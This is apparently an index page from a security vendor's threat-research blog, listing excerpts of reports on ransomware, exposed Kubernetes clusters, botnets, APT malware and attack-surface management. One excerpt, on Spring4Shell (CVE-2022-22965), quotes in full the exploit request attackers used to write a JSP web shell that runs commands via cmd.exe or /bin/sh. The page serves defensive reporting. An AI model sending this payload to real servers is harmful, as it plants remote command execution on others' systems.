New Linux-Based Ransomware Cheerscrypt Targets ESXi Devices

New Linux-Based Ransomware Cheerscrypt Targets ESXi Devices

New Linux-Based Ransomware Cheerscrypt Targets ESXi Devices Ransomware Trend Micro Research detected “Cheerscrypt”, a new Linux-based ransomware variant that compromises ESXi servers. We discuss our initial findings in this report. By: Arianne Dela Cruz, Byron Gelera, McJustine De Guzman, Warren Sto.Tomas May 25, 2022 Read time:  ( words) We recently observed multiple Linux-based ransomware detections that malicious actors launched to target VMware ESXi servers, a bare-metal hypervisor for creating and running several virtual machines (VMs)…

Read More

The Fault in Our kubelets: Analyzing the Security of Publicly Exposed Kubernetes Clusters

The Fault in Our kubelets: Analyzing the Security of Publicly Exposed Kubernetes Clusters

The Fault in Our kubelets: Analyzing the Security of Publicly Exposed Kubernetes Clusters Cloud While researching cloud-native tools, our Shodan scan revealed over 200,000 publicly exposed Kubernetes clusters and kubelet ports that can be abused by criminals. By: Magno Logan May 24, 2022 Read time:  ( words) While researching cloud-native tools and how they can reveal information about a system or an organization, we came across some data sets from Shodan concerning Kubernetes clusters (aka…

Read More

Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR

Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR

Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR Trend Micro’s Managed XDR team addressed a Kingminer botnet attack conducted through an SQL exploit. We discuss our findings and analysis in this report. By: Buddy Tancio, Jed Valderama May 18, 2022 Read time:  ( words) We observed malicious activities in a client’s SQL server that flagged a potential exploit in one public-facing device. A quick look at the Trend Micro Vision One™ Workbench showed…

Read More

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

Conclusion While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it. We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones. In addition, aside from its availability, the decision to choose the specific rootkit driver…

Read More

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

We dubbed these downloaders PuppetDownloaders since they are connected to the PuppetLoader malware family, as evidenced by our observations: This malware and PuppetLoader both use the same string decryption routine that uses the same key. This malware and PuppetLoader both use the same XOR key (2726c6aea9970bb95211304705b5f595) that is used to decrypt the embedded Loader.dll file. This malware and PuppetLoader’s decrypted Loader.dlls share similar strings such as “[-] UnExist pwszModuleFunName:”. This suggests that a common framework…

Read More

Here’s a Path to Better Attack Surface Risk Management

Here’s a Path to Better Attack Surface Risk Management

So, how can security leaders stay on top of their attack surface and ahead of the bad guys? By leveraging a unified cybersecurity platform that enables continuous security visibility and monitoring across the discovery, assessment, and mitigation phases of the attack surface risk lifecycle. Let’s dive deeper into how a platform can enhance attack surface risk management versus utilizing point products. Discover your digital attack surface First, you need total visibility to be able to…

Read More

Attack Surface Management Partner Bit Discovery Bolsters Offering

Attack Surface Management Partner Bit Discovery Bolsters Offering

Security starts with visibility: you can’t protect what you can’t see. And yet, this is a perennial problem in cybersecurity. We’re excited to bring attack surface discovery capabilities to the Trend Micro One platform, providing ongoing visibility to internal assets (devices, identities, applications) but also external, Internet-facing assets. And we’re doing the latter in partnership with Bit Discovery, an innovative start-up founded by Jeremiah Grossman (previously co-founder of WhiteHat Security). How bad is the attack…

Read More

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners. The following code is used to create the web shell: GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1 Host: <redacted>:<redacted> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 X: <% Y: Runtime Z: %>// Accept-Encoding: gzip   The web shell’s…

Read More

An Investigation of the BlackCat Ransomware via Trend Micro Vision One

An Investigation of the BlackCat Ransomware via Trend Micro Vision One

An Investigation of the BlackCat Ransomware via Trend Micro Vision One Ransomware We recently investigated a case related to the BlackCat ransomware group using the Trend Micro Vision One™ platform, which comes with extended detection and response (XDR) capabilities. BlackCat (aka AlphaVM or AlphaV) is a ransomware family created in the Rust programming language and operated under a ransomware-as-a-service (RaaS) model. By: Lucas Silva, Leandro Froes April 18, 2022 Read time:  ( words) We recently…

Read More

An In-Depth Look at ICS Vulnerabilities Part 3

An In-Depth Look at ICS Vulnerabilities Part 3

The items on this chart are showing what percentages of ICS-affecting vulnerabilities identified by 2021 advisories are caused by what kind of weaknesses – “flaws, faults, bugs, or other errors” – in coding. Nine percent was caused by CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer, while CWE-787 Out-of-Bounds Write affected 8.3%. Additionally, 6.7% was caused by CWE-20 Improper Input Validation and 4.8% was due to CWE-79 Improper Neutralization of Input…

Read More
1 5 6 7 8 9 11